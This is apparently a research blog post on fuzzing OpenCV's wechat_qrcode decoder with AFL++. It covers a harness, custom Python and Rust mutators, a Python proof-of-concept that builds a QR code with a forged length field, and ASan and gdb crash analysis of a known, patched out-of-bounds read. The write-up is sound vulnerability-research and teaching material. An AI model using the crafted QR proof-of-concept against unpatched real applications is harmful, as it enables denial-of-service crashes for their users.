wechat qrcode bug fuzzing

TL;DR: For the recently disclosed QR code parsing bug in opencv_contrib/modules/wechat_qrcode, I wrote a custom mutator (in both Python and Rust) and used AFL++ to fuzz my way to the bug.

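I recently picked fuzzing back up to learn some bug-hunting techniques, since I am getting ready to look for a job; I never did figure out academia. This post is a record of what I learned.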


Start a new AFL++ container

cd /src

git clone https://github.com/opencv/opencv_contrib.git && git -C opencv_contrib checkout 960b3f685f39c0602b8a0dd35973a82ee72b7e3c

git clone https://github.com/opencv/opencv.git && git -C opencv checkout 85ea247cc6fd840ee477d03fc9aa31c8c7f6d9ef

mkdir build && cd build

cmake -DCMAKE_C_COMPILER=afl-clang-fast -DCMAKE_CXX_COMPILER=afl-clang-fast++ -DBUILD_SHARED_LIBS=OFF -DOPENCV_EXTRA_MODULES_PATH=/src/opencv_contrib/modules /src/opencv

Modify opencv_contrib/modules/wechat_qrcode/test/test_main.cpp:

#include <iostream>
#include <vector>
#include <string>
#include "test_precomp.hpp"
#include "opencv2/objdetect.hpp"
#include "opencv2/wechat_qrcode.hpp"

using namespace std;
using namespace cv;

int main(int argc, char **argv) {
    if (argc < 2) return 1;
    string image_path(argv[1]);
    Mat src = imread(image_path, IMREAD_GRAYSCALE);
    if (!src.empty()) {
        wechat_qrcode::WeChatQRCode detector;
        vector<string> outs = detector.detectAndDecode(src);
        // print outs
        for (size_t i = 0; i < outs.size(); i++) {
            cout << outs[i] << endl;
        }
    }
    return 0;
}

AFL_USE_ASAN=1 make -j32 -C modules/wechat_qrcode

target: bin/opencv_test_wechat_qrcode


After building, try a PoC to make sure the build works:

fix(wechat_qrcode): Init nBytes after the count value is determined by Konano · Pull Request #3480 · opencv/opencv_contrib (github.com)

Reference code for generating the PoC:

import qrcode
from qrcode.util import *
from qrcode import QRCode

def hack_put(self, num, length):
        if num == 0:
            num = 1 # make a fake length, too big will not crash 
        for i in range(length):
            self.put_bit(((num >> (length - i - 1)) & 1) == 1)

qrcode.util.BitBuffer.put = hack_put # random_put

qr = QRCode(1, qrcode.constants.ERROR_CORRECT_L, mask_pattern=0)

data = "POC".encode("utf-8")
data += b' ' * (19-len(data)-3) # 19 is the total number of data codewords for version 1-L; the -3 accounts for the mode and length indicators, which take 24 bits in total, exactly 3 bytes.
user_data=QRData(data, MODE_8BIT_BYTE)
hack_data=QRData(b'', MODE_8BIT_BYTE)

qr.add_data(user_data)
qr.add_data(hack_data)

img = qr.make_image()
img.save('hack.png')


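I will skip the bug analysis; the PR above explains it. For more background on QR codes, see this reproduction write-up: WECHAT二维码闪退分析 [Analysis of the WeChat QR code crash] - FreeBuf网络安全行业门户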


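Now we could grab some QR code images and start fuzzing like crazy. But even a very small QR code image is over 300 bytes, and bit-level mutations will most likely not get past OpenCV's image parsing, so it could take forever to trigger this bug.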
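To illustrate why blind bit flips rarely survive image parsing, here is a minimal sketch, assuming the seeds are PNG files. Every PNG chunk carries a CRC-32 over its type and data, so a single flipped bit inside a chunk invalidates it. The helper names (png_chunk, chunk_crc_ok, flip_bit) and the 21x21 IHDR values are made up for this illustration and are not part of the fuzzing setup.

```python
import struct
import zlib


def png_chunk(chunk_type: bytes, data: bytes) -> bytes:
    """Serialize one PNG chunk: length, type, data, CRC-32 over type+data."""
    crc = zlib.crc32(chunk_type + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + chunk_type + data + struct.pack(">I", crc)


def chunk_crc_ok(chunk: bytes) -> bool:
    """Recompute the CRC of a serialized chunk and compare it to the stored one."""
    (length,) = struct.unpack(">I", chunk[:4])
    body = chunk[4:8 + length]  # chunk type + chunk data
    (stored,) = struct.unpack(">I", chunk[8 + length:12 + length])
    return (zlib.crc32(body) & 0xFFFFFFFF) == stored


def flip_bit(blob: bytes, bit_index: int) -> bytes:
    """Return a copy of blob with exactly one bit flipped."""
    out = bytearray(blob)
    out[bit_index // 8] ^= 1 << (bit_index % 8)
    return bytes(out)


# IHDR of a hypothetical 21x21, 8-bit grayscale image.
ihdr = png_chunk(b"IHDR", struct.pack(">IIBBBBB", 21, 21, 8, 0, 0, 0, 0))

# Flip every single bit after the length field (type, data, and CRC bytes)
# and count how many mutated chunks still carry a matching CRC.
survivors = sum(
    chunk_crc_ok(flip_bit(ihdr, i)) for i in range(4 * 8, len(ihdr) * 8)
)
print("chunk bytes:", len(ihdr), "single-bit flips with a valid CRC:", survivors)
```

A decoder that enforces chunk CRCs rejects every one of these mutations before the pixel data is even looked at, which is one reason a format-aware mutator helps here.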

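So the natural idea is to mutate on top of a correctly formatted QR code image. evilpan has already tried this approach, but with a much broader mutation scope: he randomly generates every optional QR code field and then applies bit flips to the resulting valid QR code. He fuzzed for a month without seeing a crash. That is how proper fuzzing should be done, but here I am holding a hammer and looking for the nail, so I mutate in a targeted way.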


AFL++ persistent mode

Persistent mode is much faster than the default AFL++ mode; the official docs claim a 10x to 20x speedup. See: AFLplusplus/instrumentation/README.persistent_mode.md at stable · AFLplusplus/AFLplusplus · GitHub

In my own fuzzing runs, persistent mode was indeed more than 10 times faster than the default build of opencv_test_wechat_qrcode.


Modify opencv_contrib/modules/wechat_qrcode/test/test_main.cpp:

#include <iostream>
#include <vector>
#include <string>
#include "test_precomp.hpp"
#include "opencv2/objdetect.hpp"
#include "opencv2/wechat_qrcode.hpp"

using namespace std;
using namespace cv;

int fuzz_buf(unsigned char *buf, size_t size) {
  Mat src = imdecode(Mat(1, size, CV_8UC1, buf), IMREAD_GRAYSCALE);
  if (!src.empty()) {
    auto detector = wechat_qrcode::WeChatQRCode();
    std::vector<std::string> outs = detector.detectAndDecode(src);
    return outs.size();
  }
  return -1;
}

__AFL_FUZZ_INIT();

int main() {
  // anything else here, e.g. command line arguments, initialization, etc.
#ifdef __AFL_HAVE_MANUAL_CONTROL
  __AFL_INIT();
#endif

  unsigned char *buf = __AFL_FUZZ_TESTCASE_BUF;  // must be after __AFL_INIT
                                                 // and before __AFL_LOOP!
  while (__AFL_LOOP(10000)) {
    int len = __AFL_FUZZ_TESTCASE_LEN;  // don't use the macro directly in a
                                        // call!
    if (len < 8) continue;  // check for a required/useful minimum input length
    /* Setup function call, e.g. struct target *tmp = libtarget_init() */
    /* Call function to be fuzzed, e.g.: */
    fuzz_buf(buf, len);
    /* Reset state. e.g. libtarget_free(tmp) */
  }
  return 0;
}

The build target path is the same:

target: bin/opencv_test_wechat_qrcode

mv bin/opencv_test_wechat_qrcode bin/opencv_test_wechat_qrcode_persist


fuzzing cmd:

afl-fuzz -i corpus/ -o output -t +2000 -- ./opencv_test_wechat_qrcode_persist

Put a few QR code images that parse correctly under corpus/.



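After nearly a day of fuzzing I found nothing useful. All 28 crashing inputs were cv::Exception image-parsing errors raised by OpenCV's own input checks; the resulting aborts are uninteresting, and none of them reached the key decode function in the target module.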

terminate called after throwing an instance of 'cv::Exception'
  what():  OpenCV(4.8.0-pre) /src/opencv/modules/imgcodecs/src/loadsave.cpp:77: error: (-215:Assertion failed) static_cast<size_t>(size.height) <= CV_IO_MAX_IMAGE_HEIGHT in function 'validateInputImageSize'

Aborted (core dumped)
34304
terminate called after throwing an instance of 'cv::Exception'
  what():  OpenCV(4.8.0-pre) /src/opencv/modules/imgcodecs/src/loadsave.cpp:79: error: (-215:Assertion failed) pixels <= CV_IO_MAX_IMAGE_PIXELS in function 'validateInputImageSize'

Aborted (core dumped)
34304
terminate called after throwing an instance of 'cv::Exception'
  what():  OpenCV(4.8.0-pre) /src/opencv/modules/imgcodecs/src/loadsave.cpp:75: error: (-215:Assertion failed) static_cast<size_t>(size.width) <= CV_IO_MAX_IMAGE_WIDTH in function 'validateInputImageSize'

This matches the fuzzing results evilpan reported.
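Sorting such crashes by hand gets tedious, so here is a small sketch of how the stderr of each replayed crash could be triaged. The function names classify_crash and failing_check are hypothetical helpers written for this illustration; the sample strings are shortened from the logs in this post.

```python
import re
from typing import Optional, Tuple


def classify_crash(stderr_text: str) -> str:
    """Bucket one crash by what its stderr output looks like."""
    if "AddressSanitizer" in stderr_text:
        return "asan"  # memory error reported by ASan: worth a closer look
    if "cv::Exception" in stderr_text:
        return "cv_exception"  # uncaught OpenCV exception, usually an input check
    return "other"


def failing_check(stderr_text: str) -> Optional[Tuple[str, str]]:
    """Extract (function, condition) from an OpenCV 'Assertion failed' message."""
    match = re.search(r"Assertion failed\) (.+?) in function '([^']+)'", stderr_text)
    if match is None:
        return None
    return match.group(2), match.group(1)


sample_cv = (
    "terminate called after throwing an instance of 'cv::Exception'\n"
    "  what():  OpenCV(4.8.0-pre) /src/opencv/modules/imgcodecs/src/loadsave.cpp:79: "
    "error: (-215:Assertion failed) pixels <= CV_IO_MAX_IMAGE_PIXELS "
    "in function 'validateInputImageSize'\n"
)
sample_asan = "==204888==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000005\n"

print(classify_crash(sample_cv), failing_check(sample_cv))
print(classify_crash(sample_asan), failing_check(sample_asan))
```

Running each file from the AFL++ crashes directory through the target and feeding its stderr to classify_crash would quickly show whether anything other than input-size assertions was hit.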


custom mutator

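Next comes the hammer-looking-for-a-nail part. We already know the root cause: in opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp, the function DecodedBitStreamParser::decodeByteSegment assigns nBytes and count incorrectly. As a result, when a data segment of the QR code is read, the count can be nonzero while the data is empty (data = ""), which ends in an invalid memory access. See the PR mentioned above for the details.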
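The mismatch can be modelled with a toy parser. This is only a sketch of my reading of the PR title ("Init nBytes after the count value is determined") and of the crash, not the zxing code: it assumes the parser clamps count to the bits that are actually available, while nBytes keeps the unclamped value. The names read_segment and InvalidRead are invented for the illustration, and the exception stands in for the out-of-bounds read a native build would perform.

```python
class InvalidRead(Exception):
    """Stands in for the invalid memory read that a native build would hit."""


def read_segment(payload: bytes, count: int, fixed: bool) -> bytes:
    """Toy byte-segment reader; `count` is the attacker-controlled length field."""
    n_bytes = count  # buggy order: captured before count is validated
    available_bits = len(payload) * 8
    if count * 8 > available_bits:
        # Assumed repair step: clamp count to what the stream really contains.
        count = (available_bits + 7) // 8
    if fixed:
        n_bytes = count  # fixed order: initialised after count is final
    buf = payload[:count]  # buffer sized by the clamped count
    if n_bytes > len(buf):
        raise InvalidRead(f"append of {n_bytes} bytes from a {len(buf)}-byte buffer")
    return buf[:n_bytes]


# First segment: count matches the data, both variants behave the same.
print(read_segment(b"deadbeefdeadbeef", 16, fixed=False))

# Second segment: nonzero count but no data left in the stream.
try:
    read_segment(b"", 13, fixed=False)
except InvalidRead as exc:
    print("buggy order:", exc)
print("fixed order:", read_segment(b"", 13, fixed=True))
```

Under these assumptions, the only inputs that matter are segments whose count field claims more bytes than remain in the stream, which is what a targeted mutator should produce.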

To keep things simple, we can write a custom mutator that generates a small QR code and then wildly randomizes two fields of a data segment: its length and its count.


import qrcode
from qrcode.util import *
import random
from qrcode import util, QRCode
from bisect import bisect_left
from io import BytesIO

def hack_data_len(data):
    # return len(data) # original
    return random.randint(0,18) # make a fake length, too big will not crash

def hack_create_data(version, error_correction, data_list):

    buffer = BitBuffer()
    for data in data_list:
        buffer.put(data.mode, 4)
        data_len = hack_data_len(data)
        buffer.put(data_len, length_in_bits(data.mode, version))
        data.write(buffer)

    # Calculate the maximum number of bits for the given version.
    rs_blocks = base.rs_blocks(version, error_correction)
    bit_limit = sum(block.data_count * 8 for block in rs_blocks)
    if len(buffer) > bit_limit:
        raise exceptions.DataOverflowError(
            "Code length overflow. Data size (%s) > size available (%s)"
            % (len(buffer), bit_limit)
        )

    # Terminate the bits (add up to four 0s).
    for _ in range(min(bit_limit - len(buffer), 4)):
        buffer.put_bit(False)

    # Delimit the string into 8-bit words, padding with 0s if necessary.
    delimit = len(buffer) % 8
    if delimit:
        for _ in range(8 - delimit):
            buffer.put_bit(False)

    # Add special alternating padding bitstrings until buffer is full.
    bytes_to_fill = (bit_limit - len(buffer)) // 8
    for i in range(bytes_to_fill):
        if i % 2 == 0:
            buffer.put(PAD0, 8)
        else:
            buffer.put(PAD1, 8)

    return create_bytes(buffer, rs_blocks)

qrcode.util.create_data = hack_create_data

def init(seed):
    """
    Called once when AFLFuzz starts up. Used to seed our RNG.

    @type seed: int
    @param seed: A 32-bit random value
    """
    random.seed(233)

def fuzz(buf, add_buf, max_size):
    """
    Called per fuzzing iteration.

    @type buf: bytearray
    @param buf: The buffer that should be mutated.

    @type add_buf: bytearray
    @param add_buf: A second buffer that can be used as mutation source.

    @type max_size: int
    @param max_size: Maximum size of the mutated output. The mutation must not
        produce data larger than max_size.

    @rtype: bytearray
    @return: A new bytearray containing the mutated data
    """
    
    qr = QRCode(1, qrcode.constants.ERROR_CORRECT_L, mask_pattern=0) # version 1-L: at most 16 bytes of data
    data = b"deadbeef" * random.randint(0, 4)
    data2 = b"deadbeef" * random.randint(0, 4)
    qr.add_data(QRData(data, MODE_8BIT_BYTE))
    qr.add_data(QRData(data2, MODE_8BIT_BYTE))
    img = qr.make_image()
    img_bytes = BytesIO()
    img.save(img_bytes, "png")
    return bytearray(img_bytes.getvalue())

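Here we choose version 1 with EC level L (1-L), which holds at most 19 data codewords. The mode and count indicators take 3 bytes, so the data we control is 16 bytes long. The payload is b"deadbeef" repeated n times, up to 24 bytes according to my notes (randint(0, 4) in the Python code above actually allows up to 32), which is enough to get an overflow.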

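qrcode.make_image always ends up calling qrcode.util.create_data, so we override that function. The only change is that, when writing data_list into the buffer, we control the count field with a random length, data_len = hack_data_len(data). hack_data_len draws from [0, 18] (random.randint is inclusive on both ends), which is just enough to exceed 16 and overflow.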
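The capacity arithmetic behind these numbers can be checked in a few lines. This is only a worked example; the constant names are mine, and the field widths are the standard ones for byte mode in versions 1 to 9 (4-bit mode indicator, 8-bit character count).

```python
DATA_CODEWORDS_1L = 19    # data codewords available in version 1, EC level L
MODE_BITS = 4             # mode indicator width
COUNT_BITS_BYTE_MODE = 8  # character count width for byte mode, versions 1-9
SEGMENTS = 2              # the mutator emits two byte-mode segments

# Two segment headers: 2 * (4 + 8) = 24 bits = 3 bytes.
header_bits = SEGMENTS * (MODE_BITS + COUNT_BITS_BYTE_MODE)
header_bytes = header_bits // 8

# What is left for payload once both headers are written.
payload_bytes = DATA_CODEWORDS_1L - header_bytes


def overflowing_counts(max_count: int) -> list:
    """Count values in [0, max_count] that claim more bytes than the payload holds."""
    return [c for c in range(max_count + 1) if c > payload_bytes]


print("header bytes:", header_bytes)
print("payload bytes:", payload_bytes)
print("counts from randint(0, 18) that overflow:", overflowing_counts(18))
```

Counts that are smaller than the real segment length but still larger than what remains in the stream after the first segment can also trigger the mismatch, so the list above is a lower bound on the interesting values.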


fuzzing cmd:

AFL_CUSTOM_MUTATOR_ONLY=1 PYTHONPATH=$PWD AFL_PYTHON_MODULE=qrcode_mutator afl-fuzz -i corpus/ -o output_w_mutator -t +9000 -- ./opencv_test_wechat_qrcode_persist




Within half an hour a crash appeared, and the very first crash hit the target bug.


id-000000.png




QR code parsed with QRazyBox - QR Code Analysis and Recovery Toolkit (merri.cx)

[AFL++ ca32c4c1ac87] /src/build/fuzzing # ./opencv_test_wechat_qrcode output_w_mutator/id-000000.png
AddressSanitizer:DEADLYSIGNAL
=================================================================
==204888==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000005 (pc 0x7f3e12b0fa60 bp 0x7ffc402fcff0 sp 0x7ffc402fc7a8 T0)
==204888==The signal is caused by a READ memory access.
==204888==Hint: address points to the zero page.
    #0 0x7f3e12b0fa60  (/lib/x86_64-linux-gnu/libc.so.6+0xc4a60) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)
    #1 0x55a00ce4a497 in __interceptor_memcpy (/src/build/fuzzing/opencv_test_wechat_qrcode+0x3c6497) (BuildId: 96f5964f2bbc86cfa7923e5f345d712478fc66a8)
    #2 0x7f3e12de0892 in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::_M_append(char const*, unsigned long) (/lib/x86_64-linux-gnu/libstdc++.so.6+0x14d892) (BuildId: f57e02bfadacc0c923c82457d5e18e1830b5faea)
    #3 0x55a00d343a9e in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::append(char const*, unsigned long) /usr/lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/basic_string.h:1246:9
    #4 0x55a00d343a9e in zxing::qrcode::DecodedBitStreamParser::append(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, char const*, unsigned long, zxing::ErrorHandler&) /src/opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp:108:12
    #5 0x55a00d343a9e in zxing::qrcode::DecodedBitStreamParser::decodeByteSegment(zxing::Ref<zxing::BitSource>, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, int, zxing::common::CharacterSetECI*, zxing::ArrayRef<zxing::ArrayRef<char> >&, zxing::ErrorHandler&) /src/opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp:227:5
    #6 0x55a00d348d03 in zxing::qrcode::DecodedBitStreamParser::decode(zxing::ArrayRef<char>, zxing::qrcode::Version*, zxing::qrcode::ErrorCorrectionLevel const&, zxing::ErrorHandler&, int) /src/opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp:463:25
    #7 0x55a00d2509be in zxing::qrcode::Decoder::decode(zxing::Ref<zxing::BitMatrix>, bool, zxing::ErrorHandler&) /src/opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoder.cpp:158:20
    #8 0x55a00d24d50b in zxing::qrcode::Decoder::decode(zxing::Ref<zxing::BitMatrix>, zxing::ErrorHandler&) /src/opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoder.cpp:47:30
    #9 0x55a00d1d7259 in zxing::qrcode::QRCodeReader::decodeMore(zxing::Ref<zxing::BinaryBitmap>, zxing::Ref<zxing::BitMatrix>, zxing::DecodeHints, zxing::ErrorHandler&) /src/opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/qrcode_reader.cpp:120:30
    #10 0x55a00d1d3936 in zxing::qrcode::QRCodeReader::decode(zxing::Ref<zxing::BinaryBitmap>, zxing::DecodeHints) /src/opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/qrcode_reader.cpp:46:31
    #11 0x55a00d1fab94 in cv::wechat_qrcode::DecoderMgr::Decode(zxing::Ref<zxing::BinaryBitmap>, zxing::DecodeHints) /src/opencv_contrib/modules/wechat_qrcode/src/decodermgr.cpp:89:21
    #12 0x55a00d1fab94 in cv::wechat_qrcode::DecoderMgr::TryDecode(zxing::Ref<zxing::LuminanceSource>, std::vector<zxing::Ref<zxing::Result>, std::allocator<zxing::Ref<zxing::Result> > >&) /src/opencv_contrib/modules/wechat_qrcode/src/decodermgr.cpp:78:15
    #13 0x55a00d1f465f in cv::wechat_qrcode::DecoderMgr::decodeImage(cv::Mat, bool, std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >&, std::vector<std::vector<cv::Point_<float>, std::allocator<cv::Point_<float> > >, std::allocator<std::vector<cv::Point_<float>, std::allocator<cv::Point_<float> > > > >&) /src/opencv_contrib/modules/wechat_qrcode/src/decodermgr.cpp:46:19
    #14 0x55a00d1c87e8 in cv::wechat_qrcode::WeChatQRCode::Impl::decode[abi:cxx11](cv::Mat const&, std::vector<cv::Mat, std::allocator<cv::Mat> >&, std::vector<cv::Mat, std::allocator<cv::Mat> >&) /src/opencv_contrib/modules/wechat_qrcode/src/wechat_qrcode.cpp:148:34
    #15 0x55a00d1c674a in cv::wechat_qrcode::WeChatQRCode::detectAndDecode[abi:cxx11](cv::_InputArray const&, cv::_OutputArray const&) /src/opencv_contrib/modules/wechat_qrcode/src/wechat_qrcode.cpp:100:19
    #16 0x55a00cee699f in main /src/opencv_contrib/modules/wechat_qrcode/test/test_main.cpp:27:40
    #17 0x7f3e12a74d8f  (/lib/x86_64-linux-gnu/libc.so.6+0x29d8f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)
    #18 0x7f3e12a74e3f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x29e3f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)
    #19 0x55a00ce31d04 in _start (/src/build/fuzzing/opencv_test_wechat_qrcode+0x3add04) (BuildId: 96f5964f2bbc86cfa7923e5f345d712478fc66a8)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xc4a60) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d) 
==204888==ABORTING

custom mutator(Rust)

Python is too slow, so I wrote a Rust version; AFL++ has an official example to start from:

image = "0.22.0"

qrcode git v0.11.2

rand = "0.8.4"

#![cfg(unix)]
#![allow(unused_variables)]
use custom_mutator::{export_mutator, CustomMutator};
use image::Luma;
use qrcode::QrCode;
use qrcode::bits::Bits;
use qrcode::types::{EcLevel, Version};

use rand::Rng;

struct ExampleMutator {
    own_image_buffer: Vec<u8>,
}

impl CustomMutator for ExampleMutator {
    type Error = ();

    fn init(seed: u32) -> Result<Self, Self::Error> {
        // print a message to console
        println!("ExampleMutator init() called with seed {}", seed);
        Ok(Self {
            own_image_buffer: Vec::new(),
        })
    }

    fn fuzz<'b, 's: 'b>(
        &'s mut self,
        buffer: &'b mut [u8],
        add_buff: Option<&[u8]>,
        max_size: usize,
    ) -> Result<Option<&'b [u8]>, Self::Error> {
        
        let bytes_data: &[u8] = b"deadbeef";
        let bytes_data1 = bytes_data.repeat(rand::thread_rng().gen_range(0..=3));
        let bytes_data2 = bytes_data.repeat(rand::thread_rng().gen_range(0..=3));

        let mut bits: Bits = Bits::new(Version::Normal(1));
        bits.push_byte_data(bytes_data1.as_slice());
        bits.push_byte_data(bytes_data2.as_slice());
        bits.push_terminator(EcLevel::L);

        let qrcode = QrCode::with_bits(bits, EcLevel::L).unwrap();
        let image = qrcode.render::<Luma<u8>>().build();
        image.save("./temp-rust-qrcode.png").unwrap();
        let bytes_vec = std::fs::read("./temp-rust-qrcode.png").unwrap();
        self.own_image_buffer = bytes_vec;
        
        Ok(Some(self.own_image_buffer.as_slice()))
    }
}

export_mutator!(ExampleMutator);

This requires patching the rust-qrcode library. The key change is one function in bits.rs:

use rand::Rng;

impl Bits {
    /// Encodes 8-bit byte data to the bits.
    pub fn push_byte_data(&mut self, data: &[u8]) -> QrResult<()> {
        // use the thread-local RNG to generate a random number between 0 and 17 (inclusive)
        let data_len = rand::thread_rng().gen_range(0..=17);

        self.push_header(Mode::Byte, data_len)?;
        for b in data {
            self.push_number(8, u16::from(*b));
        }
        Ok(())
    }
}

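The second argument of push_header is replaced with a random number, the same idea as in the Python code. The rust-qrcode project also needs the rand crate added as a dependency.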


After this patch, the generated QR code fails an assertion in the construct_codewords function in ec.rs, so I simply commented that assertion out.


After building, pass the path of the resulting .so file through this environment variable:

export AFL_CUSTOM_MUTATOR_LIBRARY=/src/build/fuzzing/rust_mutator/target/debug/examples/libexample_mutator.so

fuzzing cmd:

AFL_CUSTOM_MUTATOR_ONLY=1 afl-fuzz -i corpus/ -o output_w_rust -t +5000 -- ./opencv_test_wechat_qrcode_persist


It is much faster: throughput went from about 6 executions per second to about 180.



manual check

In gdb, following the crash report above, set one breakpoint on zxing::qrcode::DecodedBitStreamParser::decodeByteSegment and another on memcpy, then run.

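When the first data segment is read, the arguments of void *memcpy(void *dst, const void *src, size_t count) are passed in rdi, rsi, rdx, per the System V AMD64 calling convention: rdx holds the length 16, and rsi points to the string "deadbeefdeadbeef".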



Continue execution until the next data segment is read.



This time memcpy is asked to copy 13 bytes, but rsi points to 0x0, so the access is necessarily invalid.


summary

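This bug is genuinely hard to find by fuzzing. You need a mutator designed specifically around the decode process to have a chance of finding it quickly; otherwise the fuzzer just goes in circles in the image-parsing code.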

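I only found it because I already knew where the bug was and designed the mutator around it, so this result is very weak. Fuzzing all fields would require rewriting much more of the QR code generation code, plus a fairly deep understanding of the QR code format.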

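Also, this QR code mutator only mutates randomly (fuzz() ignores buf and generates a fresh image on every call), so it does not seem to benefit from AFL++'s power schedule; I suspect coverage guidance is not really being used.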


As a learning demo, it is good enough.


ref:

fix(wechat_qrcode): Init nBytes after the count value is determined by Konano · Pull Request #3480 · opencv/opencv_contrib (github.com)

针对二维码解析库的 Fuzzing 测试 [Fuzz testing QR code parsing libraries] (seebug.org)

Fuzzing in Depth | AFLplusplus

QRazyBox - QR Code Analysis and Recovery Toolkit (merri.cx)